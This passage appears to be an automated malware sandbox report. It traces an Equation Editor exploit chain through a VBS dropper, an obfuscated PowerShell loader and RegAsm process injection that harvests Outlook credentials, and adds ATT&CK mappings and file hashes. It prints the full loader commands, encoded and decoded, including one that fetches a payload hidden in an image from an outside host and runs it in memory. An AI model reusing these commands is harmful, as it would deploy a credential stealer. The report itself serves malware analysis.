- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1828

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2572

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2344

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\megapixelpiclove.vbs"
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:700

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDUDgTreNQDgTrevDgTreDkDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwByDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrewDgTreDQDgTreMQDgTrezDgTreDkDgTreOQDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre1DgTreDUDgTreLwDgTre5DgTreDkDgTreNwDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTrecgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMDgTreDgTre0DgTreDEDgTreMwDgTre5DgTreDkDgTreMwDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBIDgTreEMDgTreQQBNDgTreC8DgTreMQDgTre0DgTreDEDgTreNDgTreDgTrevDgTreDIDgTreODgTreDgTreuDgTreDkDgTreMQDgTreyDgTreC4DgTreMgDgTrezDgTreC4DgTreNwDgTrewDgTreDIDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreE0DgTreQQBDDgTreEgDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2912

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/755/997/original/new_image_r.jpg?1710413993', 'https://uploaddeimagens.com.br/images/004/755/997/original/new_image_r.jpg?1710413993'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HCAM/1414/28.912.23.702//:ptth' , '1' , 'C:\ProgramData\' , 'MACH','RegAsm',''))} }"
4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2560

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\MACH.vbs
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1916

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3052

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\iokmjzn"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:984

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\liyfjryqno"
6⤵
- Accesses Microsoft Outlook accounts
PID:2476

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\vldpkkjjbwpod"
6⤵
PID:1748

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\vldpkkjjbwpod"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1495DD322A24490E2BF2FAABAE1C61

Filesize
299B

MD5
5ae8478af8dd6eec7ad4edf162dd3df1

SHA1
55670b9fd39da59a9d7d0bb0aecb52324cbacc5a

SHA256
fe42ac92eae3b2850370b73c3691ccf394c23ab6133de39f1697a6ebac4bedca

SHA512
a5ed33ecec5eecf5437c14eba7c65c84b6f8b08a42df7f18c8123ee37f6743b0cf8116f4359efa82338b244b28938a6e0c8895fcd7f7563bf5777b7d8ee86296

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
660ea45543db7852ff0e3239ac5cd483

SHA1
ecf8cf7d0586c7ea2c31f1325f1f4345ee383c72

SHA256
f5651a2f799be4e21d398cb78bacd455da4dd31940f62acdcaa94af993f11a51

SHA512
69c72dd57db33aa0c80c3c04ea98236ffee3151fb5416ecb19dbc1a2718de1aa610099777a60bf04e81e086557832d828e036e154ceeee0823baafebe6007ec6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1495DD322A24490E2BF2FAABAE1C61

Filesize
192B

MD5
fd15edf67a21083effce689fd636702b

SHA1
343a5ec3b624029fd6f65700652137dde80682d0

SHA256
b56262d7b5434e37d3026fac93805e4c970b27e60301e10978f52846aea2f390

SHA512
b807c2782b7d738e9df2c240fb97f4efa0de037ddb5ba0dba54e52f248104df0af0f26d38ebd026ab6f90274143a95627f3b382e043df6fb4d7d396eadb165f4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
03873b090a166f7ba061d9ef80efd7d4

SHA1
6fc64c4c4192d6e75f187072a89071953a087692

SHA256
c1844e3c6fd42790ee397dec1da44e006af8eb4fdbe6d27beceb6bd1c8b0180b

SHA512
258e82be903882a66d399d91cd5e6bd7af7286a858919deadb1b46929c08451a6b5889d3f2f9105fdee40dc74e05eb8ddd2bb571b61a0e673c85ae440603661b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
53cde73b76e0e7abf39932628b8eaa56

SHA1
917b78e87aac11da2f0c757845cf9ea87ec4ec61

SHA256
9c2008b32c029344f5258e74e1d93ac7d5a2360ecdadcab8d8db8c7b13dccf46

SHA512
f1e932f96f36da6612912bb1e9f51a49f480e65e8446b737f751d2e26d980b7a957dbb9f66c7d911e1c66dc452ac487bd03e27d2bb6c894e9693a7f4dbef74ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{04850CFB-3EBB-45D3-A3E5-399B26519D1F}.FSD

Filesize
128KB

MD5
47ae3ffe1617c4a99b4d039cbc4826a3

SHA1
8908006e3b9292864e4cc49446c152888c0fb4d4

SHA256
4015aca86db6c960d70a659cb3afac567b5cb6f284ee423ba4061649c8eb0869

SHA512
e1857d8c7e2bd123841e9c8076e4ed4037dd03dd323a216f969aa2991c5b458b9d6b8fca806fec105fc4b65836d65c414a8e06abecf2c83fee780a5bbc035915

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
ccd5471f9229268fec114f833b2c1fe0

SHA1
4cae63b2dada92e49ef670f2311c98437e8228f5

SHA256
52dde8bebe9c19bd3a14e8914e47d0e01f3fc5ebe6ad78cdddd4c3d451ca14bb

SHA512
4d7a6b7f69af9391bf445edde6eba6c151c9353dbfd005d68a31e375844726832b3998973e10a6929e2a5eb81d7cad50dc6e8e621dca8e5976f266556133da6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{583EBF09-8E06-47C2-9CD3-2E16AF689196}.FSD

Filesize
128KB

MD5
eaa0e593c52610e7e9b9e9471ccbcbbe

SHA1
1f66b82064a7c010bdbb55e95559c45fad3e0b03

SHA256
55fbed13e17043f8f8e16f0d37382648907e723e53c9dc117f34aceb2bffc0b2

SHA512
d6cd8b89fccd21cdeae8b490e0e04858688e09c2151b32e070d3354b9ec10b1c72f395ee7d224464e64ddfbf256df7506e1fb38f0e8d51c41cc551c318ffd46e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\macbookproloverkissedeachotherstohanldhowamaclovercanbeatanothermacloverwithallmyheartshekissedtheperson____withentireprocesskissoflove[1].doc

Filesize
65KB

MD5
d36738689697fff4cd6dd39dcd065aee

SHA1
dc8e8a4988987f7c8b6d628597429ffe9b398056

SHA256
989d32416fa41d152d4db47469c9cbc7a35c50c72b0d3b52f5781709227896b3

SHA512
4217caf74242412f7dc37cd3dc62900514a3206456b0abf18ea264a4b3938ddaa96e5c230cf60654dcab74b8ecf824f06506cd3e5332ad5be1763fbeb78099d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab28F7.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2E1C.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Local\Temp\iokmjzn

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\{ACE12B57-EFD1-4F15-AF19-834265F05138}

Filesize
128KB

MD5
e37abff192e6892f6f2af17c5da68058

SHA1
6d40aeb16911569f53264d38b366e92736e91d04

SHA256
514d1d816cc5eb86102224d563fe71f256df73d169fb9ac9f476b52b496dc43d

SHA512
adbfb0dfe338a73be34800d7297a360294592d1ad71ec94f1a6ea0e056a3dfc9da543e104ff171c349497cbe4550387bec22a840d6876551279a83fa50e69285

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
76a0fdc75eb7f1ce383dc954edcedbc1

SHA1
78ac4a3b9607f2e8e2fae2dd2f943046f5367399

SHA256
32bed1ce91eb9bb331cd227cfb54cfd4401668586c51abcad1cdccf67b563e79

SHA512
f894925c78ddf200ba5bc66b3c8e7b534f08e43d41b3e4649365610e91896839772c422ea7178940899735e3be4543f6c1b0ccda8351e30317cf2916e9d4de0c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
c63d770649d0f076a83f9cc6ec9bab92

SHA1
16619ba69abc068e90c0e9e67462c1a82023aa50

SHA256
704378c07f93c5aab906282ba964865253a2295b9d17027f095eacba15d8b6ad

SHA512
d68454bd30d90471d63c851e61d23fc46ecd3e6a1b12b95e821526a8f859d268a34df8d68ea4e017f44fcb094ca25534b8c537fe61bca127186befdeb17b1a47

Download Submit
C:\Users\Admin\AppData\Roaming\megapixelpiclove.vbs

Filesize
3KB

MD5
a095815e104c84004544e0aa3da0976e

SHA1
f212cf6da02a3ab33582d0001a1a6eac7857f6d6

SHA256
a246ece65c385cb71161bfe6f3d6d102f04a86990938268fc2b8e6c77a104426

SHA512
2097984325179ec833278c38baef1f5a38ed5e209c90077152ee5505980ff3ed83ce90ae0abdd9ecc1057b4adeab70dc0feda7ca0e215c9c8ace892531b2596f

Download Submit
memory/984-334-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/984-369-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/984-337-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/984-343-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/984-340-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/984-346-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1740-103-0x0000000002E60000-0x0000000002E62000-memory.dmp

Filesize
8KB

Download
memory/1740-166-0x00000000721AD000-0x00000000721B8000-memory.dmp

Filesize
